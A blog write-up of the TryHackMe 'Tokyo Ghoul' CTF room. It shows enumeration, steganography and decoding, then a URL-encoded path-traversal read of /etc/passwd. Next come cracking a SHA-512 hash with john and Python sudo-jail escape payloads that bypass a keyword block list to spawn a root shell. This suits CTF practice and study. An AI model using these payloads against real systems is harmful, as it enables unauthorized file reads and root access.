---
layout: post
title: "Tokyo Ghoul - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - eop
  - web
  - lfi
  - linux
  - python
  - system
  - ftp
date: 2022/11/01 21:07:00
thumbnail: /images/TryHackMe/tokyoghoul.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Tokyo Ghoul
- **Profile:** [tryhackme.com](https://tryhackme.com/room/tokyoghoul666)
- **Difficulty:** Medium
- **Description**: Help kaneki escape jason room

![Tokyo Ghoul](/images/TryHackMe/tokyoghoul.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap steghide radare2 john ffuf
```

{% chart [width] [height] %}
{
  type: 'polarArea',
  responsive: false,
  data: {
    labels: ['Enumeration', 'Real-Life', 'Well-Known Vulnerabilities', 'Custom Exploitation', 'CTF-Like', 'Scripting'],
    datasets: [{
      label: 'Box rating',
      backgroundColor: [
        'rgba(54, 163, 235, 0.5)',
        'rgba(255, 99, 132, 0.5)',
        'rgba(75, 192, 192, 0.5)',
        'rgba(255, 205, 86, 0.5)',
        'rgba(68, 205, 58, 0.5)',
        'rgba(244, 81, 30, 0.5)'
      ],
      borderColor: [
        'rgba(54, 163, 235, 1)',
        'rgba(255, 99, 132, 1)',
        'rgba(75, 192, 192, 1)',
        'rgba(255, 205, 86, 1)',
        'rgba(68, 205, 58, 1)',
        'rgba(244, 81, 30, 1)'
      ],
      data: [
        4,
        0,
        0,
        2,
        4,
        1
      ]
    }]
  },
  options: {
    legend: {
      position: 'right',
      labels: {
        fontSize: 25
      }
    },
    scale: {
      ticks: {
        beginAtZero: true,
        stepSize: 1,
        suggestedMax: 5
      }
    }
  }
};
{% endchart %}

## Task 2 - Where am i?

```
$ grep tokyo /etc/hosts
10.10.82.63 tokyoghoul.thm
```

```
$ sudo nmap -sSVC tokyoghoul.thm -T4 -p- -v
...
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    3 ftp      ftp          4096 Jan 23  2021 need_Help?
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.18.25.199
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
|   256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_  256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome To Tokyo goul
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...
```

## Task 3 - Planning to escape

On the website (http://tokyoghoul.thm/) the home page has a comment which is a hint:

```html
<!-- look don't tell jason but we will help you escape we will give you the key to open those chains and here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there -->
```

The ftp is accessible anonymously.

```
$ ftp tokyoghoul.thm
Connected to tokyoghoul.thm.
220 (vsFTPd 3.0.3)
Name (tokyoghoul.thm:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jan 23  2021 need_Help?
226 Directory send OK.
ftp> ls need_Help?
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           480 Jan 23  2021 Aogiri_tree.txt
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2021 Talk_with_me
226 Directory send OK.
ftp> ls need_Help?/Talk_with_me
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 ftp      ftp         17488 Jan 23  2021 need_to_talk
-rw-r--r--    1 ftp      ftp         46674 Jan 23  2021 rize_and_kaneki.jpg
226 Directory send OK.
```

Here are the files on the FTP:

```
$ tree files
files
|-- Aogiri_tree.txt
`-- Talk_with_me
    |-- need_to_talk
    `-- rize_and_kaneki.jpg
```

`Talk_with_me/need_to_talk` is a ELF binary.

The binary is asking for a passphrase, we can find it by viewing the strings.

```
$ rabin2 -z files/Talk_with_me/need_to_talk
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002008 0x00002008 9   10   .rodata ascii EDITED_PASS_HERE
1   0x00002018 0x00002018 37  38   .rodata ascii Hey Kaneki finnaly you want to talk \n
2   0x00002040 0x00002040 82  83   .rodata ascii Unfortunately before I can give you the kagune you need to give me the paraphrase\n
3   0x00002098 0x00002098 35  36   .rodata ascii Do you have what I'm looking for?\n\n
4   0x000020c0 0x000020c0 47  48   .rodata ascii Good job. I believe this is what you came for:\n
5   0x000020f0 0x000020f0 51  52   .rodata ascii Hmm. I don't think this is what I was looking for.\n
6   0x00002128 0x00002128 36  37   .rodata ascii Take a look inside of me. rabin2 -z\n
```

I guess `rize_and_kaneki.jpg` may requires some stego.

We can use `steghide` to

```
$ steghide extract -sf files/Talk_with_me/rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
```

## Task 4 - What Rize is traying to say?

`yougotme.txt` is containing some other stego... I looks like some morse code.

```
haha you are so smart kaneki but can you talk my code

..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..


if you can talk it allright you got my secret directory
```

We can put all this nonsense in [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Morse_Code('Space','Line%20feed')From_Hex('Space')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=Li4uLi4gLi0KLi4uLi0gLi4uLi0KLi4uLi0gLS4uLi4KLS0uLi4gLS0tLS4KLi4uLi0gLS4uCi4uLi0tIC4uLS0tCi4uLi4tIC0uLgouLi4tLSAuLi4tLQouLi4uLSAtLi4KLi4uLi0gLS0tLi4KLi4uLi0gLi0KLi4uLS0gLi4uLi4KLi4uLi4gLS0tLi4KLi4uLS0gLi4tLS0KLi4uLi0gLgotLi4uLiAtLi0uCi0uLi4uIC4uLS0tCi0uLi4uIC4KLi4uLi4gLi4tLS0KLS4uLi4gLS4tLgotLi4uLiAuLi4tLQotLi4uLiAtLS4uLgouLi4tLSAtLi4KLi4uLS0gLS4u), because it's after the morse code is some hex and them a base64, just to retrieve a key.

We can then browse to `http://tokyoghoul.thm/<key_here>` but there is nothing here.

No we have nothing else we already found to explore. Let's fuzz the website to find some files or directories.

```
$ ffuf -u 'http://tokyoghoul.thm/<key_here>/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc all -fc 404 -fs 279
$ ffuf -u 'http://tokyoghoul.thm/<key_here>/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc all -fc 404 -fs 279
...
claim                   [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 30ms]
...
```

There is a link pointing to `http://tokyoghoul.thm/<key_here>/claim/index.php?view=flower.gif`, so there is maybe a vulnerability in the `view` parameter.

Let's try a basic local file read: `..` is blocked se we need to URLencode it.

```
http://tokyoghoul.thm/<key_here>/claim/index.php?view=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```

Now we can try to crack the password hash of `kamishiro`.

```
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
statd:x:110:65534::/var/lib/nfs:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
vagrant:x:1000:1000:vagrant,,,:/home/vagrant:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash
```

Let's find the hash type with [haiti](https://github.com/noraj/haiti).

```
$ cat hash.txt | haiti -
SHA-512 Crypt [HC: 1800] [JtR: sha512crypt]
```

The password is cracking nearly instantly:

```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
EDITED      (?)
1g 0:00:00:01 DONE (2022-11-01 20:37) 0.9803g/s 1505p/s 1505c/s 1505C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

## Task 5 - Fight Jason

With kamishiro account we can connect over SSH.

```
$ ssh kamishiro@tokyoghoul.thm
```

The EoP is kind of a python jail:

```
kamishiro@vagrant:~$ cat user.txt
EDITED
kamishiro@vagrant:~$ sudo -l
Matching Defaults entries for kamishiro on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kamishiro may run the following commands on vagrant.vm:
    (ALL) /usr/bin/python3 /home/kamishiro/jail.py

kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> import os
Do you think i will let you do this ??????
```

We can take a look at the source code:

```
kamishiro@vagrant:~$ ls -lhA jail.py
-rw-r--r-- 1 root root 588 Jan 23  2021 jail.py
kamishiro@vagrant:~$ cat jail.py
```

```python
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()
```

It's a easy python jail that was copied from a gist, [some people already solved it](https://anee.me/escaping-python-jails-849c65cf306e).

So we could use this payload:

```python
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
```

But it's not fun to copy a payload and it's not optimzed, we can do shorter and easier:

```python
__builtins__.__dict__['__im' + 'port__']('pty').spawn('/bin/bash')
```

```
kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__im' + 'port__']('pty').spawn("/bin/bash")
root@vagrant:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vagrant:~# cat /root/root.txt
EDITED
```

## Conclusion

This is yet another toxic challenge, containing false steganography, guessing,
unrealistic steps, etc.

Challenge authors have to ask themselves:

- What the user will learn?
- Is it useful?
- Is it realistic?
- Is it enjoyable? (guessing and unrealistic behavior may annoy people)
- Is it hard because it requires advanced technical skills or because there are a lot of guessing steps?
- etc.

Hopefully the author didn't create another room and nowadays TryHackMe wouldn't accept this kind of challenges with their new policy.
